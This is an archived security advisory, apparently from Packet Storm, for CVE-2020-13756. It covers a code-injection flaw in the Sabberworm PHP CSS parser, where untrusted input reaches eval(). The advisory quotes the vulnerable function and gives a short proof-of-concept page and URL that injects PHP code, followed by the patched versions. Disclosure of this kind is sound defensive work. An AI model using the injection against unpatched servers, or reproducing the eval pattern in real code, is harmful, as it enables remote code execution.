what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Sabberworm PHP CSS Code Injection

Sabberworm PHP CSS Code Injection
Posted Jun 3, 2020
Authored by Eldar Marcussen

Sabberworm PHP CSS parser suffers from a code injection vulnerability. Many versions are affected.

tags | exploit, php
advisories | CVE-2020-13756
SHA-256 | cbff4c11162bd6a8c86cb798bce9beeaaea906f988d1e1211fcc87823ed3acb5

Sabberworm PHP CSS Code Injection

Change Mirror Download
Sabberworm PHP CSS parser - Code injection
===============================================================================

Identifiers
-------------------------------------------------
* CVE-2020-13756


CVSSv3 score
-------------------------------------------------
8.6 - [AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L](
https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L&version=3.1
)


Vendor
-------------------------------------------------
Sabberworm - https://github.com/sabberworm/PHP-CSS-Parser


Product
-------------------------------------------------
A Parser for CSS Files written in PHP. Allows extraction of CSS files into
a data structure, manipulation of said structure and output as (optimized)
CSS.


Affected versions
-------------------------------------------------
- All versions prior to the fixed versions listed below


Credit
-------------------------------------------------
Eldar Marcussen - justanotherhacker.com


Vulnerability summary
-------------------------------------------------
The Sabberworm PHP CSS Parser evaluates uncontrolled data which may result
in remote code execution if the affected function is called with attacker
controlled data.


Technical details
-------------------------------------------------
The function `allSelectors` in
`lib/Sabberworm/CSS/CSSList/CSSBlockList.php` on line `64` interpolates
untrusted data inside an `eval()` operation on line `73`.
https://github.com/sabberworm/PHP-CSS-Parser/blob/master/lib/Sabberworm/CSS/CSSList/CSSBlockList.php#L73

The function `allSelectors` is called via the function
`getSelectorsBySpecificity` in `lib/Sabberworm/CSS/CSSList/Document.php`
which is the class object returned from the `parse()` function in
`lib/Sabberworm/CSS/Parser.php`. If an attacker is able to supply or
influence the content of the data passed to the `allSelectors` or
`getSelectorsBySpecificity` functions, the server will execute attacker
controlled code.

```php
protected function allSelectors(&$aResult, $sSpecificitySearch = null) {
$aDeclarationBlocks = array();
$this->allDeclarationBlocks($aDeclarationBlocks);
foreach ($aDeclarationBlocks as $oBlock) {
foreach ($oBlock->getSelectors() as $oSelector) {
if ($sSpecificitySearch === null) {
$aResult[] = $oSelector;
} else {
$sComparison = "\$bRes = {$oSelector->getSpecificity()}
$sSpecificitySearch;";
eval($sComparison);
if ($bRes) {
$aResult[] = $oSelector;
}
}
}
}
}
```


Proof of concept
-------------------------------------------------
The following evidence is provided to illustrate the existence and
exploitation
of this vulnerability:

Save the following code as csspwn.php
```php
<?php
use Sabberworm\CSS\Parser;

$css="#test .help,\n#file,\n.help:hover,\nli.green,\nol li::before {\n
font-family: Helvetica;\n}";

$oCssParser = new Sabberworm\CSS\Parser($css);
$oDoc = $oCssParser->parse();
$oDoc->getSelectorsBySpecificity('> '.$_GET['n']);
?>
```
Serve the page via `php -S 0:8888` then open the following URL:
http://localhost:8888/csspwn.php?n=100;phpinfo()

Solution
-------------------------------------------------
Upgrade to one of the following versions:
1.0.1
2.0.1
3.0.1
4.0.1
5.0.9
5.1.3
5.2.1
6.0.2
7.0.4
8.0.1
8.1.1
8.2.1
8.3.1

Timeline
-------------------------------------------------
Date | Status
------------|---------------------
01-JUN-2020 | Reported to vendor
01-JUN-2020 | Patch available
02-JUN-2020 | Public disclosure


Login or Register to add favorites

File Archive:

June 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    0 Files
  • 2
    Jun 2nd
    0 Files
  • 3
    Jun 3rd
    18 Files
  • 4
    Jun 4th
    21 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    57 Files
  • 7
    Jun 7th
    6 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    12 Files
  • 11
    Jun 11th
    27 Files
  • 12
    Jun 12th
    38 Files
  • 13
    Jun 13th
    16 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close